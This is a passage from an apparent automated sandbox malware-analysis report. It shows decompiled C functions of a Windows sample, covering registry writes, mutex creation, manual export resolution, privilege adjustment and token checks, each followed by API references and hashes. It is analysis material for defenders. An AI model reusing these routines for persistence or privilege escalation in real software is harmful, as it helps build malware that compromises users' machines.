								E009C326E(_t68, _t61, 2); // executed
								goto L19;
							} else {
								_t43 = _t41 - 1;
								if(_t43 == 0) {
									__eflags =  *0x9d2278 - 1; // 0x0
									_t67 = 3;
									_t46 =  ==  ? _t67 : 1;
									E009C36C9(_t67, __eflags, _t61, _v12,  ==  ? _t67 : 1); // executed
									L19:
									_t70 = _t70 + 0xc;
								} else {
									_t48 = _t43 - 1;
									if(_t48 == 0) {
										E009C3740(_t61, 4); // executed
										goto L22;
									} else {
										_t81 = _t48 == 1;
										if(_t48 == 1) {
											E009C3188(_t81, _t68, _t61); // executed
											L22:
										}
									}
								}
							}
						}
						_t32 = E009C7518(_t68,  &_v12,  &_v16,  &_v8, 0xffffffff);
						_t70 = _t70 + 0x14;
						_t82 =  *0x9d1d04; // 0x1
					} while (_t82 == 0);
				}
				asm("lock dec dword [esi+0x8]");
				return 0;
			}





















                                                                                                                                                            0x009c3580
                                                                                                                                                            0x009c3586
                                                                                                                                                            0x009c3598
                                                                                                                                                            0x009c359d
                                                                                                                                                            0x009c35a7
                                                                                                                                                            0x009c35b0
                                                                                                                                                            0x009c35b2
                                                                                                                                                            0x009c3683
                                                                                                                                                            0x009c3688
                                                                                                                                                            0x009c368b
                                                                                                                                                            0x009c3691
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c3691
                                                                                                                                                            0x009c35b8
                                                                                                                                                            0x009c35b8
                                                                                                                                                            0x009c35bf
                                                                                                                                                            0x009c35c4
                                                                                                                                                            0x009c35c7
                                                                                                                                                            0x009c35d1
                                                                                                                                                            0x009c35df
                                                                                                                                                            0x009c35e2
                                                                                                                                                            0x009c35e5
                                                                                                                                                            0x009c35e8
                                                                                                                                                            0x009c35ee
                                                                                                                                                            0x009c35f1
                                                                                                                                                            0x009c35f4
                                                                                                                                                            0x009c361b
                                                                                                                                                            0x009c3622
                                                                                                                                                            0x009c3627
                                                                                                                                                            0x009c35fd
                                                                                                                                                            0x009c35fd
                                                                                                                                                            0x009c3600
                                                                                                                                                            0x009c3605
                                                                                                                                                            0x009c3608
                                                                                                                                                            0x009c360b
                                                                                                                                                            0x009c3613
                                                                                                                                                            0x009c3616
                                                                                                                                                            0x009c3616
                                                                                                                                                            0x009c362a
                                                                                                                                                            0x009c362a
                                                                                                                                                            0x009c3633
                                                                                                                                                            0x009c3636
                                                                                                                                                            0x009c3679
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c3638
                                                                                                                                                            0x009c3638
                                                                                                                                                            0x009c363b
                                                                                                                                                            0x009c365d
                                                                                                                                                            0x009c3665
                                                                                                                                                            0x009c3666
                                                                                                                                                            0x009c366e
                                                                                                                                                            0x009c367e
                                                                                                                                                            0x009c367e
                                                                                                                                                            0x009c363d
                                                                                                                                                            0x009c363d
                                                                                                                                                            0x009c3640
                                                                                                                                                            0x009c3653
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c3642
                                                                                                                                                            0x009c3642
                                                                                                                                                            0x009c3645
                                                                                                                                                            0x009c3649
                                                                                                                                                            0x009c3696
                                                                                                                                                            0x009c3697
                                                                                                                                                            0x009c3645
                                                                                                                                                            0x009c3640
                                                                                                                                                            0x009c363b
                                                                                                                                                            0x009c3636
                                                                                                                                                            0x009c36a7
                                                                                                                                                            0x009c36ac
                                                                                                                                                            0x009c36af
                                                                                                                                                            0x009c36af
                                                                                                                                                            0x009c36bb
                                                                                                                                                            0x009c36bc
                                                                                                                                                            0x009c36c6

                                                                                                                                                            APIs
                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 009C357A
                                                                                                                                                            • SetThreadPriority.KERNEL32(00000000,00000002), ref: 009C3580
                                                                                                                                                              • Part of subcall function 009C7518: GetQueuedCompletionStatus.KERNEL32(?,?,?,?,?,?,009C359D,?,?,?,?,000000FF), ref: 009C752D
                                                                                                                                                            • RtlGetLastWin32Error.NTDLL ref: 009C3683
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Thread$CompletionCurrentErrorLastPriorityQueuedStatusWin32
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3344855219-0
                                                                                                                                                            • Opcode ID: 4dfe0a1c26845a9725d4f0e736236785bf6ecb1643ab2190c902e531921a12b8
                                                                                                                                                            • Instruction ID: 24b2cfe5d0a1eb091c5885d2f09453389c9ea88171040da3e4bbb7b2210405a6
                                                                                                                                                            • Opcode Fuzzy Hash: 4dfe0a1c26845a9725d4f0e736236785bf6ecb1643ab2190c902e531921a12b8
                                                                                                                                                            • Instruction Fuzzy Hash: E2419FB2C05204BFCB109BB4CE4AFAE77ACEB44315F10826EF51596292E7319B41DB67
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C5588, Relevance: 4.5, APIs: 3, Instructions: 36registryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C5588(void* __ecx, void* _a4, short* _a8, short* _a12, int _a16, char* _a20, int _a24) {
				void* _v8;
				long _t11;
				int _t19;

				_t19 = 0;
				_t11 = RegCreateKeyExW(_a4, _a8, 0, 0, 0, 2, 0,  &_v8, 0); // executed
				if(_t11 == 0) {
					RegSetValueExW(_v8, _a12, 0, _a16, _a20, _a24); // executed
					_t19 =  ==  ? 1 : 0; // executed
					RegCloseKey(_v8); // executed
				}
				return _t19;
			}






                                                                                                                                                            0x009c558d
                                                                                                                                                            0x009c55a0
                                                                                                                                                            0x009c55a8
                                                                                                                                                            0x009c55ba
                                                                                                                                                            0x009c55c8
                                                                                                                                                            0x009c55cb
                                                                                                                                                            0x009c55cb
                                                                                                                                                            0x009c55d7

                                                                                                                                                            APIs
                                                                                                                                                            • RegCreateKeyExW.KERNEL32(00000000,009D2140,00000000,00000000,00000000,00000002,00000000,009C18E3,00000000,00000000,?,?,009C2560,80000002,?,?), ref: 009C55A0
                                                                                                                                                            • RegSetValueExW.KERNEL32(009C18E3,?,00000000,00000000,009D2198,?,?,?,009C2560,80000002,?,?,00000003,009D2100,?,009D2198), ref: 009C55BA
                                                                                                                                                            • RegCloseKey.KERNEL32(009C18E3,?,?,009C2560,80000002,?,?,00000003,009D2100,?,009D2198,00000000,?,009D2140,00000000,009C18E3), ref: 009C55CB
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CloseCreateValue
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1818849710-0
                                                                                                                                                            • Opcode ID: 828ace5a1be6ea6c555fe85ba2827747c03568a9fea87b2291eb7dfa7b2485c2
                                                                                                                                                            • Instruction ID: ceda28571d571076a4f486a63cfb1d685b7d44025110c8fb0232e411eaafc410
                                                                                                                                                            • Opcode Fuzzy Hash: 828ace5a1be6ea6c555fe85ba2827747c03568a9fea87b2291eb7dfa7b2485c2
                                                                                                                                                            • Instruction Fuzzy Hash: 02F0DA32652129BBDF255F91DC09DDB7F6DEF0A2A1B004155FA0991020D6328AA0EBE0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C6C30, Relevance: 3.1, APIs: 2, Instructions: 88libraryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C6C30(CHAR* _a4, CHAR* _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				struct HINSTANCE__* _t32;
				signed int _t36;
				void* _t37;
				int _t40;
				signed int _t41;
				char* _t47;
				void* _t48;
				void* _t53;
				intOrPtr _t57;
				intOrPtr _t62;
				intOrPtr* _t66;
				struct HINSTANCE__* _t69;

				E009C707D(0x5e69269d);
				_t32 = LoadLibraryA(_a4); // executed
				_t69 = _t32;
				if(_t69->i == 0x5a4d) {
					_t66 =  *((intOrPtr*)(_t69 + 0x3c)) + _t69;
					__eflags =  *_t66 - 0x4550;
					if( *_t66 == 0x4550) {
						_t53 =  *((intOrPtr*)(_t66 + 0x78)) + _t69;
						_v20 =  *((intOrPtr*)(_t53 + 0x1c)) + _t69;
						_t57 =  *((intOrPtr*)(_t53 + 0x20)) + _t69;
						_t36 = 0;
						_v12 = _t57;
						_v8 = 0;
						__eflags =  *(_t53 + 0x18);
						if( *(_t53 + 0x18) <= 0) {
							L7:
							_t37 = 0;
							__eflags = 0;
							L8:
							L9:
							return _t37;
						} else {
							goto L5;
						}
						while(1) {
							L5:
							_v16 =  *((intOrPtr*)(_t53 + 0x24)) + _t69;
							_t40 = lstrcmpA(_a8,  *((intOrPtr*)(_t57 + _t36 * 4)) + _t69); // executed
							__eflags = _t40;
							_t41 = _v8;
							if(_t40 == 0) {
								break;
							}
							_t57 = _v12;
							_t36 = _t41 + 1;
							_v8 = _t36;
							__eflags = _t36 -  *(_t53 + 0x18);
							if(_t36 <  *(_t53 + 0x18)) {
								continue;
							}
							goto L7;
						}
						_t62 =  *((intOrPtr*)(_v20 + ( *(_v16 + _t41 * 2) & 0x0000ffff) * 4));
						__eflags = _t62 -  *((intOrPtr*)(_t66 + 0x78));
						if(_t62 <  *((intOrPtr*)(_t66 + 0x78))) {
							L14:
							_t37 = _t62 + _t69;
							goto L8;
						}
						__eflags = _t62 -  *((intOrPtr*)(_t66 + 0x7c)) +  *((intOrPtr*)(_t66 + 0x78));
						if(__eflags >= 0) {
							goto L14;
						}
						_t68 = E009C7388(__eflags, _t62 + _t69);
						_t47 = E009C60E6(_t46, 0x2e);
						_t29 = _t47 + 1; // 0x1
						 *_t47 = 0;
						_t48 = E009C6C30(_t46, _t29);
						E009C47F8(_t68);
						_t37 = _t48;
						goto L8;
					}
					_t37 = 0;
					goto L9;
				}
				return 0;
			}



















                                                                                                                                                            0x009c6c3f
                                                                                                                                                            0x009c6c45
                                                                                                                                                            0x009c6c47
                                                                                                                                                            0x009c6c51
                                                                                                                                                            0x009c6c5b
                                                                                                                                                            0x009c6c5d
                                                                                                                                                            0x009c6c63
                                                                                                                                                            0x009c6c6d
                                                                                                                                                            0x009c6c77
                                                                                                                                                            0x009c6c7a
                                                                                                                                                            0x009c6c7c
                                                                                                                                                            0x009c6c7e
                                                                                                                                                            0x009c6c81
                                                                                                                                                            0x009c6c84
                                                                                                                                                            0x009c6c87
                                                                                                                                                            0x009c6cb3
                                                                                                                                                            0x009c6cb3
                                                                                                                                                            0x009c6cb3
                                                                                                                                                            0x009c6cb5
                                                                                                                                                            0x009c6cb6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c6c89
                                                                                                                                                            0x009c6c89
                                                                                                                                                            0x009c6c97
                                                                                                                                                            0x009c6c9a
                                                                                                                                                            0x009c6ca0
                                                                                                                                                            0x009c6ca2
                                                                                                                                                            0x009c6ca5
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c6ca7
                                                                                                                                                            0x009c6caa
                                                                                                                                                            0x009c6cab
                                                                                                                                                            0x009c6cae
                                                                                                                                                            0x009c6cb1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c6cb1
                                                                                                                                                            0x009c6cc6
                                                                                                                                                            0x009c6cc9
                                                                                                                                                            0x009c6ccc
                                                                                                                                                            0x009c6d07
                                                                                                                                                            0x009c6d07
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c6d07
                                                                                                                                                            0x009c6cd4
                                                                                                                                                            0x009c6cd6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c6ce1
                                                                                                                                                            0x009c6ce6
                                                                                                                                                            0x009c6ceb
                                                                                                                                                            0x009c6cee
                                                                                                                                                            0x009c6cf3
                                                                                                                                                            0x009c6cfb
                                                                                                                                                            0x009c6d03
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c6d03
                                                                                                                                                            0x009c6c65
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c6c65
                                                                                                                                                            0x00000000

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                            • Opcode ID: 6f601910cf46e2f672f2dd077d90d02cca42f51f92b810415febc7f3c873f3f0
                                                                                                                                                            • Instruction ID: 5c574e2018d4fccb9c2be3988dcbb2435c883039ca32486cf9e79dfffcb0679d
                                                                                                                                                            • Opcode Fuzzy Hash: 6f601910cf46e2f672f2dd077d90d02cca42f51f92b810415febc7f3c873f3f0
                                                                                                                                                            • Instruction Fuzzy Hash: F1319A70E00104ABCB14EF68CC81F69B7F8EF88300B6044AEE985D7682E775E961DB91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C520E, Relevance: 3.0, APIs: 2, Instructions: 32synchronizationCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C520E(void* __edx) {
				short _v6;
				short _v92;
				intOrPtr _v117;
				void* _t10;
				struct _SECURITY_ATTRIBUTES* _t15;

				_v117 = _v117 + __edx;
				E009C5DE2(0x9d12d0, 0x40e, 8, 0x56,  &_v92);
				_v6 = 0;
				_t15 = 0;
				_t10 = CreateMutexW(0, 0,  &_v92); // executed
				 *0x9d1d30 = _t10;
				if(_t10 != 0 && RtlGetLastWin32Error() == 0xb7) {
					_t15 = 1;
				}
				return _t15;
			}








                                                                                                                                                            0x009c520e
                                                                                                                                                            0x009c5228
                                                                                                                                                            0x009c5232
                                                                                                                                                            0x009c5236
                                                                                                                                                            0x009c523e
                                                                                                                                                            0x009c5244
                                                                                                                                                            0x009c524b
                                                                                                                                                            0x009c525a
                                                                                                                                                            0x009c525a
                                                                                                                                                            0x009c5261

                                                                                                                                                            APIs
                                                                                                                                                            • CreateMutexW.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 009C523E
                                                                                                                                                            • RtlGetLastWin32Error.NTDLL ref: 009C524D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateErrorLastMutexWin32
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 682235734-0
                                                                                                                                                            • Opcode ID: c59187124fb74b97e65ff7c9b031f8475a4378e79e6dc03b9f305816f78e9db5
                                                                                                                                                            • Instruction ID: 94b338ea844e58fa12091e00eaf44ace0c033b09b489d099ca0b0dc2ef487541
                                                                                                                                                            • Opcode Fuzzy Hash: c59187124fb74b97e65ff7c9b031f8475a4378e79e6dc03b9f305816f78e9db5
                                                                                                                                                            • Instruction Fuzzy Hash: EBF020B2E996547ADB10ABF49C06F9B3BACEF51341F014126EE0AE21C0E66084848792
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C520F, Relevance: 3.0, APIs: 2, Instructions: 32synchronizationCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C520F() {
				short _v6;
				short _v92;
				void* _t8;
				struct _SECURITY_ATTRIBUTES* _t11;

				E009C5DE2(0x9d12d0, 0x40e, 8, 0x56,  &_v92);
				_v6 = 0;
				_t11 = 0;
				_t8 = CreateMutexW(0, 0,  &_v92); // executed
				 *0x9d1d30 = _t8;
				if(_t8 != 0 && RtlGetLastWin32Error() == 0xb7) {
					_t11 = 1;
				}
				return _t11;
			}







                                                                                                                                                            0x009c5228
                                                                                                                                                            0x009c5232
                                                                                                                                                            0x009c5236
                                                                                                                                                            0x009c523e
                                                                                                                                                            0x009c5244
                                                                                                                                                            0x009c524b
                                                                                                                                                            0x009c525a
                                                                                                                                                            0x009c525a
                                                                                                                                                            0x009c5261

                                                                                                                                                            APIs
                                                                                                                                                            • CreateMutexW.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 009C523E
                                                                                                                                                            • RtlGetLastWin32Error.NTDLL ref: 009C524D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateErrorLastMutexWin32
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 682235734-0
                                                                                                                                                            • Opcode ID: ee328d6e7d33df3d1cb11fd705515d2997add5d335f8b08559a9ed577b7f99ae
                                                                                                                                                            • Instruction ID: 125a96b8441e6c18b4803a793f20e4160358a7c32032b0c1a71eadc29d7fa4b2
                                                                                                                                                            • Opcode Fuzzy Hash: ee328d6e7d33df3d1cb11fd705515d2997add5d335f8b08559a9ed577b7f99ae
                                                                                                                                                            • Instruction Fuzzy Hash: 9FF0E5B2E9561877D710ABE49C06F9B77ACEF51741F014122FE0AE21C0EB60D98487E2
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C4CEB, Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                            			E009C4CEB(void* _a4) {
				void _v8;
				void* _v12;
				long _v16;
				signed int _t17;

				_v8 = _v8 & 0x00000000;
				if(OpenProcessToken(_a4, 8,  &_v12) != 0) {
					_t17 = GetTokenInformation(_v12, 0x12,  &_v8, 4,  &_v16); // executed
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t17;
					E009C4B21(_v12);
				}
				return _v8;
			}







                                                                                                                                                            0x009c4cf1
                                                                                                                                                            0x009c4d06
                                                                                                                                                            0x009c4d17
                                                                                                                                                            0x009c4d22
                                                                                                                                                            0x009c4d24
                                                                                                                                                            0x009c4d27
                                                                                                                                                            0x009c4d2c
                                                                                                                                                            0x009c4d33

                                                                                                                                                            APIs
                                                                                                                                                            • OpenProcessToken.ADVAPI32(009C5954,00000008,009C5954,?,009C5954), ref: 009C4CFE
                                                                                                                                                            • GetTokenInformation.KERNELBASE(009C5954,00000012(TokenIntegrityLevel),00000000,00000004,?,?,009C5954), ref: 009C4D17
                                                                                                                                                              • Part of subcall function 009C4B21: FindCloseChangeNotification.KERNEL32(00000000,?,009C7476,00000000,?,009C74D2,00000000,00000000,?,009C33C5,?,00000000,00000000,009C3571,00000000), ref: 009C4B2D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Token$ChangeCloseFindInformationNotificationOpenProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3152771255-0
                                                                                                                                                            • Opcode ID: 8b1527034e6c24f0a5f7eaefd67982e6c30ec4de1649093e8e1f42cd59d8bf2d
                                                                                                                                                            • Instruction ID: fc601fc79c70a4625cba1051e76b776f7eb3607d9a190be7ae2287f66f25da6c
                                                                                                                                                            • Opcode Fuzzy Hash: 8b1527034e6c24f0a5f7eaefd67982e6c30ec4de1649093e8e1f42cd59d8bf2d
                                                                                                                                                            • Instruction Fuzzy Hash: D5F0F876A9420CBBDB10DAE0DD46FEDBBB8EB04702F1040A5BA04E2091D7319F58AB51
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C532C, Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C532C(void* __ecx, long _a4) {
				char _v5;
				long _t7;
				long _t11;

				_v5 = 0;
				_t7 = RtlAdjustPrivilege(_a4, 1, 1,  &_v5);
				if(_t7 == 0 || _t7 != 0xc000007c) {
					L4:
					return 1;
				} else {
					_t11 = RtlAdjustPrivilege(_a4, 1, 0,  &_v5); // executed
					if(_t11 == 0) {
						goto L4;
					}
					return 0;
				}
			}






                                                                                                                                                            0x009c5333
                                                                                                                                                            0x009c533f
                                                                                                                                                            0x009c5347
                                                                                                                                                            0x009c5369
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c5350
                                                                                                                                                            0x009c535b
                                                                                                                                                            0x009c5363
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c5365

                                                                                                                                                            APIs
                                                                                                                                                            • RtlAdjustPrivilege.NTDLL(?,00000001,00000001,?), ref: 009C533F
                                                                                                                                                            • RtlAdjustPrivilege.NTDLL(?,00000001,00000000,00000000), ref: 009C535B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AdjustPrivilege
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3260937286-0
                                                                                                                                                            • Opcode ID: ea1ef623fab48ad4da062b59babce1d2266882b297734d87b22f6149815083e2
                                                                                                                                                            • Instruction ID: 7410dcdcea7048da562e096d5d5518fd18cb0727a5ce358835dbcb3b57a2fb79
                                                                                                                                                            • Opcode Fuzzy Hash: ea1ef623fab48ad4da062b59babce1d2266882b297734d87b22f6149815083e2
                                                                                                                                                            • Instruction Fuzzy Hash: 92E09B32B5C348FBEF205A61DC41FAA375CB7057C0F04446DF905D5190DAE3E5C54551
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C5C8C, Relevance: 2.5, APIs: 2, Instructions: 43COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C5C8C(char* _a4) {
				short* _t7;
				int _t13;
				short* _t14;

				_t14 = 0;
				_t13 = MultiByteToWideChar(0, 0, _a4, 0xffffffff, 0, 0);
				if(_t13 != 0) {
					_t7 = E009C47AB(_t13 + _t13); // executed
					_t14 = _t7;
					if(_t14 != 0 && MultiByteToWideChar(0, 0, _a4, 0xffffffff, _t14, _t13) == 0) {
						E009C47F8(_t14);
						_t14 = 0;
					}
				}
				return _t14;
			}






                                                                                                                                                            0x009c5c9b
                                                                                                                                                            0x009c5ca5
                                                                                                                                                            0x009c5ca9
                                                                                                                                                            0x009c5caf
                                                                                                                                                            0x009c5cb4
                                                                                                                                                            0x009c5cb9
                                                                                                                                                            0x009c5ccf
                                                                                                                                                            0x009c5cd5
                                                                                                                                                            0x009c5cd5
                                                                                                                                                            0x009c5cb9
                                                                                                                                                            0x009c5cdd

                                                                                                                                                            APIs
                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,009C65B6,000000FF,00000000,00000000,?,00000000,?,?,009C65B6,?), ref: 009C5C9F
                                                                                                                                                              • Part of subcall function 009C47AB: HeapCreate.KERNEL32(00000000,00400000,00000000,?,009C1C60,?,?,009C150C), ref: 009C47C0
                                                                                                                                                              • Part of subcall function 009C47AB: GetProcessHeap.KERNEL32(?,009C1C60,?,?,009C150C), ref: 009C47CF
                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,009C65B6,000000FF,00000000,00000000,?,?,009C65B6,?), ref: 009C5CC4
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ByteCharHeapMultiWide$CreateProcess
